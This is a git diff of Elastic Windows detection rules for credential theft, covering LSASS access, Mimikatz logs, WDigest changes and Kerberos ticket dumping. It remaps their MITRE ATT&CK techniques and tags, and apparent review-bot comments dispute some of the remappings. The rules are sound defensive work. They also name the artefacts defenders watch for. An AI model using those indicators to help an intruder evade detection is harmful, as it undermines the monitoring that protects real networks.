b/rules/windows/credential_access_ldap_attributes.toml index e38375e2851..9cb9ff680a5 100644 --- a/rules/windows/credential_access_ldap_attributes.toml 
+++ b/rules/windows/credential_access_ldap_attributes.toml @@ -2,7 +2,7 @@ creation_date = "2022/11/09" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/14" [rule] author = ["Elastic"] @@ -74,7 +74,17 @@ Audit Directory Service Access (Success,Failure) ``` """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Use Case: Active Directory Monitoring", "Tactic: Credential Access", "Data Source: Active Directory", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Tactic: Privilege Escalation", + "Use Case: Active Directory Monitoring", + "Data Source: Active Directory", + "Data Source: Windows Security Event Logs", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" 
@@ -108,18 +118,41 @@ any where host.os.type == "windows" and event.code == "4662" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1003" +name = "OS Credential Dumping" +reference = "https://attack.mitre.org/techniques/T1003/" [[rule.threat.technique]] id = "T1552" name = "Unsecured Credentials" reference = "https://attack.mitre.org/techniques/T1552/" - [[rule.threat.technique.subtechnique]] id = "T1552.004" name = "Private Keys" reference = "https://attack.mitre.org/techniques/T1552/004/" + + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.002" +name = "Domain Accounts" +reference = "https://attack.mitre.org/techniques/T1078/002/" + + + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/windows/credential_access_lsass_loaded_susp_dll.toml b/rules/windows/credential_access_lsass_loaded_susp_dll.toml index 1dedfaed505..cb444a5b057 100644 --- a/rules/windows/credential_access_lsass_loaded_susp_dll.toml +++ b/rules/windows/credential_access_lsass_loaded_susp_dll.toml @@ -2,7 +2,7 @@ creation_date = "2022/12/28" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] 
@@ -20,7 +20,15 @@ references = ["https://blog.xpnsec.com/exploring-mimikatz-part-2/", "https://git risk_score = 47 rule_id = "3a6001a0-0939-4bbe-86f4-47d8faeb7b97" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -134,18 +142,19 @@ The Local Security Authority Subsystem Service (LSASS) is crucial for managing s [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1547" -name = "Boot or Logon Autostart Execution" -reference = "https://attack.mitre.org/techniques/T1547/" - +id = "T1003" +name = "OS Credential Dumping" +reference = "https://attack.mitre.org/techniques/T1003/" [[rule.threat.technique.subtechnique]] -id = "T1547.005" -name = "Security Support Provider" -reference = "https://attack.mitre.org/techniques/T1547/005/" +id = "T1003.001" +name = "LSASS Memory" +reference = "https://attack.mitre.org/techniques/T1003/001/" + + [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + diff --git a/rules/windows/credential_access_lsass_openprocess_api.toml b/rules/windows/credential_access_lsass_openprocess_api.toml index 16fd4867621..d6a78623f56 100644 --- a/rules/windows/credential_access_lsass_openprocess_api.toml +++ b/rules/windows/credential_access_lsass_openprocess_api.toml 
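Review bot: Dropping `T1547.005` / `Security Support Provider` in favour of `T1003.001` / `LSASS Memory` in `credential_access_lsass_loaded_susp_dll.toml` removes the persistence mapping for what the rule name indicates is an unusual DLL being loaded into LSASS, which is the pattern that sub-technique describes. If the remap is intentional it would be safer as an addition — keep a `[[rule.threat]]` block with `TA0003` / `Persistence` and the `T1547.005` sub-technique next to the new Credential Access block — rather than a replacement; the `tags` hunk above is consistent with the new mapping either way. A retained Persistence block would of course need its `"Tactic: Persistence"` tag kept too.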
@@ -2,7 +2,7 @@ creation_date = "2023/03/02" integration = ["endpoint", "m365_defender"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/02" [transform] [[transform.osquery]] @@ -105,7 +105,16 @@ references = ["https://github.com/redcanaryco/atomic-red-team/blob/master/atomic risk_score = 47 rule_id = "ff4599cb-409f-4910-a239-52e4e6f532ff" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Data Source: Elastic Defend", "Data Source: Microsoft Defender for Endpoint", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Data Source: Microsoft Defender for Endpoint", + "Resources: Investigation Guide" +] timestamp_override = "event.ingested" type = "esql" @@ -152,18 +161,31 @@ from logs-endpoint.events.api-*, logs-m365_defender.event-* metadata _id, _versi [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" - [[rule.threat.technique.subtechnique]] id = "T1003.001" name = "LSASS Memory" reference = "https://attack.mitre.org/techniques/T1003/001/" + + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1106" +name = "Native API" +reference = "https://attack.mitre.org/techniques/T1106/" + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/credential_access_machine_account_smb_relay.toml b/rules/windows/credential_access_machine_account_smb_relay.toml index 528c8f6fb7d..74eb4c912b9 100644 --- a/rules/windows/credential_access_machine_account_smb_relay.toml 
+++ b/rules/windows/credential_access_machine_account_smb_relay.toml @@ -2,7 +2,7 @@ creation_date = "2025/06/16" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/14" [rule] author = ["Elastic"] @@ -82,18 +82,24 @@ file where host.os.type == "windows" and event.code == "5145" and endswith(user. [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1187" +name = "Forced Authentication" +reference = "https://attack.mitre.org/techniques/T1187/" [[rule.threat.technique]] id = "T1557" name = "Adversary-in-the-Middle" reference = "https://attack.mitre.org/techniques/T1557/" - [[rule.threat.technique.subtechnique]] id = "T1557.001" name = "LLMNR/NBT-NS Poisoning and SMB Relay" reference = "https://attack.mitre.org/techniques/T1557/001/" + + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + diff --git a/rules/windows/credential_access_mimikatz_memssp_default_logs.toml b/rules/windows/credential_access_mimikatz_memssp_default_logs.toml index 3605e41a057..cbc58475eaa 100644 --- a/rules/windows/credential_access_mimikatz_memssp_default_logs.toml +++ b/rules/windows/credential_access_mimikatz_memssp_default_logs.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/31" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/26" [rule] author = ["Elastic"] 
@@ -73,7 +73,19 @@ Hence for this rule to work effectively, users will need to add a custom ingest For more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html """ severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Persistence", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint", "Data Source: Crowdstrike"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Crowdstrike", +] timestamp_override = "event.ingested" type = "eql" @@ -84,31 +96,14 @@ file where host.os.type == "windows" and file.name : "mimilsa.log" and process.n [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1556" -name = "Modify Authentication Process" -reference = "https://attack.mitre.org/techniques/T1556/" +id = "T1003" +name = "OS Credential Dumping" +reference = "https://attack.mitre.org/techniques/T1003/" + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1547" -name = "Boot or Logon Autostart Execution" -reference = "https://attack.mitre.org/techniques/T1547/" - -[[rule.threat.technique.subtechnique]] -id = "T1547.005" -name = "Security Support Provider" -reference = "https://attack.mitre.org/techniques/T1547/005/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" 
diff --git a/rules/windows/credential_access_mimikatz_powershell_module.toml b/rules/windows/credential_access_mimikatz_powershell_module.toml index 2e5c4f9ded2..19d4c6879de 100644 --- a/rules/windows/credential_access_mimikatz_powershell_module.toml +++ b/rules/windows/credential_access_mimikatz_powershell_module.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/07" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/26" [rule] author = ["Elastic"] @@ -135,26 +135,22 @@ powershell.file.script_block_text:( [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" - [[rule.threat.technique.subtechnique]] id = "T1003.001" name = "LSASS Memory" reference = "https://attack.mitre.org/techniques/T1003/001/" -[[rule.threat.technique]] -id = "T1649" -name = "Steal or Forge Authentication Certificates" -reference = "https://attack.mitre.org/techniques/T1649/" + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/credential_access_mod_wdigest_security_provider.toml b/rules/windows/credential_access_mod_wdigest_security_provider.toml index 20494bd67fa..d54be2d33fe 100644 --- a/rules/windows/credential_access_mod_wdigest_security_provider.toml +++ b/rules/windows/credential_access_mod_wdigest_security_provider.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/19" integration = ["endpoint", "windows", "m365_defender"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/11" [rule] author = ["Elastic"] 
@@ -75,7 +75,17 @@ references = [ risk_score = 73 rule_id = "d703a5af-d5b0-43bd-8ddb-7a5d500b7da5" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Defense Evasion", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Microsoft Defender for Endpoint", +] timestamp_override = "event.ingested" type = "eql" @@ -90,26 +100,19 @@ registry where host.os.type == "windows" and event.type in ("creation", "change" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1556" -name = "Modify Authentication Process" -reference = "https://attack.mitre.org/techniques/T1556/" +id = "T1003" +name = "OS Credential Dumping" +reference = "https://attack.mitre.org/techniques/T1003/" +[[rule.threat.technique.subtechnique]] +id = "T1003.001" +name = "LSASS Memory" +reference = "https://attack.mitre.org/techniques/T1003/001/" + + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1112" -name = "Modify Registry" -reference = "https://attack.mitre.org/techniques/T1112/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/windows/credential_access_moving_registry_hive_via_smb.toml b/rules/windows/credential_access_moving_registry_hive_via_smb.toml index b16d5bc3658..7dc0c02f2da 100644 --- a/rules/windows/credential_access_moving_registry_hive_via_smb.toml 
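Review bot: `credential_access_mod_wdigest_security_provider.toml` now maps only to `T1003.001` / `LSASS Memory` and drops both `T1556` / `Modify Authentication Process` and the second block with `T1112` / `Modify Registry` under Defense Evasion, yet the hunk's own context (`registry where host.os.type == "windows" and event.type in ("creation", "change"`) shows the rule fires on a registry modification, not on a memory read. Tampering with the WDigest setting is commonly catalogued under `T1112` and `T1556`; removing both leaves the mapping describing the attacker's later objective rather than the observed behaviour the rule actually detects. Suggest keeping `T1112` under Defense Evasion (and restoring the matching `"Tactic: Defense Evasion"` tag removed in the tags hunk above), with `T1003.001` as an additional technique if desired.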
+++ b/rules/windows/credential_access_moving_registry_hive_via_smb.toml @@ -2,7 +2,7 @@ creation_date = "2022/02/16" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/07/02" [rule] author = ["Elastic"] @@ -54,7 +54,15 @@ references = ["https://www.elastic.co/security-labs/detect-credential-access"] risk_score = 47 rule_id = "a4c7473a-5cb4-4bc1-9d06-e4a75adbc494" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Exfiltration", "Resources: Investigation Guide", "Data Source: Elastic Defend"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Tactic: Credential Access", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", +] timestamp_override = "event.ingested" type = "eql" 
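Review bot: In `credential_access_moving_registry_hive_via_smb.toml` the new `tags` list places `"Tactic: Lateral Movement"` ahead of `"Tactic: Credential Access"`, whereas every other tags hunk in this chunk and this file's own `[[rule.threat]]` order put Credential Access first. Purely stylistic, but since these lists appear to be regenerated, emitting tactics in threat order keeps the diffs predictable: `"Tactic: Credential Access", "Tactic: Lateral Movement",`.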
@@ -75,31 +83,36 @@ file where host.os.type == "windows" and event.type == "creation" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" - [[rule.threat.technique.subtechnique]] id = "T1003.002" name = "Security Account Manager" reference = "https://attack.mitre.org/techniques/T1003/002/" + + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1048" -name = "Exfiltration Over Alternative Protocol" -reference = "https://attack.mitre.org/techniques/T1048/" +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" +[[rule.threat.technique.subtechnique]] +id = "T1021.002" +name = "SMB/Windows Admin Shares" +reference = "https://attack.mitre.org/techniques/T1021/002/" + + [rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" + diff --git a/rules/windows/credential_access_persistence_network_logon_provider_modification.toml b/rules/windows/credential_access_persistence_network_logon_provider_modification.toml index aaa45725f4f..3f82b5ebbed 100644 --- a/rules/windows/credential_access_persistence_network_logon_provider_modification.toml +++ b/rules/windows/credential_access_persistence_network_logon_provider_modification.toml @@ -2,7 +2,7 @@ creation_date = "2021/03/18" integration = ["endpoint", "m365_defender", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [transform] [[transform.osquery]] 
@@ -151,36 +151,26 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1556" name = "Modify Authentication Process" reference = "https://attack.mitre.org/techniques/T1556/" -[[rule.threat.technique.subtechnique]] -id = "T1556.008" -name = "Network Provider DLL" -reference = "https://attack.mitre.org/techniques/T1556/008/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1556" -name = "Modify Authentication Process" -reference = "https://attack.mitre.org/techniques/T1556/" +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" -[[rule.threat.technique.subtechnique]] -id = "T1556.008" -name = "Network Provider DLL" -reference = "https://attack.mitre.org/techniques/T1556/008/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/windows/credential_access_posh_invoke_ninjacopy.toml b/rules/windows/credential_access_posh_invoke_ninjacopy.toml index 80fbae1a397..756fcb25eba 100644 --- a/rules/windows/credential_access_posh_invoke_ninjacopy.toml +++ b/rules/windows/credential_access_posh_invoke_ninjacopy.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/23" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/26" [rule] author = ["Elastic"] 
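Review bot: `credential_access_persistence_network_logon_provider_modification.toml` removes the `T1556.008` / `Network Provider DLL` sub-technique from the Credential Access block and swaps the Persistence block to `T1543` / `Create or Modify System Process`, although the filename and the `registry where ... event.type == "change"` context indicate the rule watches network-provider registration specifically, which is exactly what `T1556.008` describes. The old side mapped the identical `T1556` / `T1556.008` pair under both tactics; this hunk resolves that by replacing the Persistence copy rather than by dropping the duplicate, so the precise mapping is lost on both sides. Suggest keeping the sub-technique under Credential Access, and if a Persistence mapping is still wanted, stating in the commit message why `T1543` fits, since nothing in the hunk motivates it.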
@@ -111,7 +111,14 @@ references = [ risk_score = 73 rule_id = "b8386923-b02c-4b94-986a-d223d9b01f88" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: PowerShell Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: PowerShell Logs", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -135,12 +142,10 @@ event.category:process and host.os.type:windows and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" - [[rule.threat.technique.subtechnique]] id = "T1003.002" name = "Security Account Manager" 
@@ -151,41 +156,43 @@ id = "T1003.003" name = "NTDS" reference = "https://attack.mitre.org/techniques/T1003/003/" + + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1006" -name = "Direct Volume Access" -reference = "https://attack.mitre.org/techniques/T1006/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1006" +name = "Direct Volume Access" +reference = "https://attack.mitre.org/techniques/T1006/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/credential_access_posh_kerb_ticket_dump.toml b/rules/windows/credential_access_posh_kerb_ticket_dump.toml index e73e3c3e9ab..8039fe58cfc 100644 --- a/rules/windows/credential_access_posh_kerb_ticket_dump.toml +++ b/rules/windows/credential_access_posh_kerb_ticket_dump.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/26" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/26" [rule] author = ["Elastic"] 
@@ -126,16 +126,40 @@ event.category:process and host.os.type:windows and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1003" +name = "OS Credential Dumping" +reference = "https://attack.mitre.org/techniques/T1003/" [[rule.threat.technique]] id = "T1558" name = "Steal or Forge Kerberos Tickets" reference = "https://attack.mitre.org/techniques/T1558/" + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/credential_access_posh_minidump.toml b/rules/windows/credential_access_posh_minidump.toml index 6839473f031..f417da3fdb8 100644 --- a/rules/windows/credential_access_posh_minidump.toml +++ b/rules/windows/credential_access_posh_minidump.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/05" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/26" [rule] author = ["Elastic"] 
@@ -112,7 +112,14 @@ PowerShell Script Block Logging must be enabled to generate the events used by t Setup instructions: https://ela.st/powershell-logging-setup """ severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Execution", "Resources: Investigation Guide", "Data Source: PowerShell Logs"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Resources: Investigation Guide", + "Data Source: PowerShell Logs", +] timestamp_override = "event.ingested" type = "query" @@ -123,39 +130,40 @@ event.category:process and host.os.type:windows and powershell.file.script_block [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" - [[rule.threat.technique.subtechnique]] id = "T1003.001" name = "LSASS Memory" reference = "https://attack.mitre.org/techniques/T1003/001/" + + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/credential_access_posh_relay_tools.toml b/rules/windows/credential_access_posh_relay_tools.toml index bb431c9bf71..87be03b98ba 100644 --- a/rules/windows/credential_access_posh_relay_tools.toml +++ b/rules/windows/credential_access_posh_relay_tools.toml 
@@ -2,7 +2,7 @@ creation_date = "2024/03/27" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/26" [rule] author = ["Elastic"] @@ -98,7 +98,14 @@ PowerShell Script Block Logging must be enabled to generate the events used by t Setup instructions: https://ela.st/powershell-logging-setup """ severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Execution", "Tactic: Lateral Movement", "Resources: Investigation Guide", "Data Source: PowerShell Logs"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Resources: Investigation Guide", + "Data Source: PowerShell Logs", +] timestamp_override = "event.ingested" type = "query" 
@@ -118,57 +125,52 @@ event.category:process and host.os.type:windows and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1557" name = "Adversary-in-the-Middle" reference = "https://attack.mitre.org/techniques/T1557/" -[[rule.threat.technique.subtechnique]] -id = "T1557.001" -name = "LLMNR/NBT-NS Poisoning and SMB Relay" -reference = "https://attack.mitre.org/techniques/T1557/001/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1550" name = "Use Alternate Authentication Material" reference = "https://attack.mitre.org/techniques/T1550/" - [[rule.threat.technique.subtechnique]] id = "T1550.002" name = "Pass the Hash" reference = "https://attack.mitre.org/techniques/T1550/002/" + + [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/credential_access_posh_request_ticket.toml b/rules/windows/credential_access_posh_request_ticket.toml index 033602a029e..3c2c8435952 100644 --- a/rules/windows/credential_access_posh_request_ticket.toml +++ b/rules/windows/credential_access_posh_request_ticket.toml @@ -2,7 +2,7 @@ creation_date = "2022/01/24" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/26" [rule] author = ["Elastic"] 
@@ -98,7 +98,14 @@ PowerShell Script Block Logging must be enabled to generate the events used by t
 Setup instructions: https://ela.st/powershell-logging-setup
 """
 severity = "high"
-tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Execution", "Resources: Investigation Guide", "Data Source: PowerShell Logs"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Credential Access",
+ "Resources: Investigation Guide",
+ "Data Source: PowerShell Logs",
+]
 timestamp_override = "event.ingested"
 type = "query"
@@ -116,39 +123,45 @@ event.category:process and host.os.type:windows and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1003"
+name = "OS Credential Dumping"
+reference = "https://attack.mitre.org/techniques/T1003/"
 [[rule.threat.technique]]
 id = "T1558"
 name = "Steal or Forge Kerberos Tickets"
 reference = "https://attack.mitre.org/techniques/T1558/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1558.003"
 name = "Kerberoasting"
 reference = "https://attack.mitre.org/techniques/T1558/003/"
+
+
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
-
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1059"
 name = "Command and Scripting Interpreter"
 reference = "https://attack.mitre.org/techniques/T1059/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1059.001"
 name = "PowerShell"
 reference = "https://attack.mitre.org/techniques/T1059/001/"
+
+
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
+
+
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/windows/credential_access_posh_veeam_sql.toml b/rules/windows/credential_access_posh_veeam_sql.toml
index df4b429b3b9..fa457a50f0f 100644
--- a/rules/windows/credential_access_posh_veeam_sql.toml
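Review bot: `T1003` OS Credential Dumping is added as a standalone technique to a rule whose existing mapping is `T1558.003` Kerberoasting, i.e. requesting service tickets rather than extracting credential material from LSASS, SAM or NTDS, so the new technique does not describe what the detection covers (the query itself is outside this hunk). The same blanket `T1003` insertion appears in `credential_access_posh_veeam_sql.toml`, `credential_access_saved_creds_vault_winlog.toml`, `credential_access_saved_creds_vaultcmd.toml`, `credential_access_veeam_backup_dll_imageload.toml`, `credential_access_veeam_commands.toml` and `credential_access_wireless_creds_dumping.toml`, where the behaviour is already mapped under `T1555` Credentials from Password Stores. Consider keeping only the specific technique, or stating in the commit message why `T1003` is meant to apply across these rules. The hunk also inserts runs of blank `+` lines before `[rule.threat.tactic]` whose length varies from file to file (two here, three in several others), which is worth normalising to one.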
+++ b/rules/windows/credential_access_posh_veeam_sql.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/03/14"
 integration = ["windows"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2026/01/26"
 [rule]
 author = ["Elastic"]
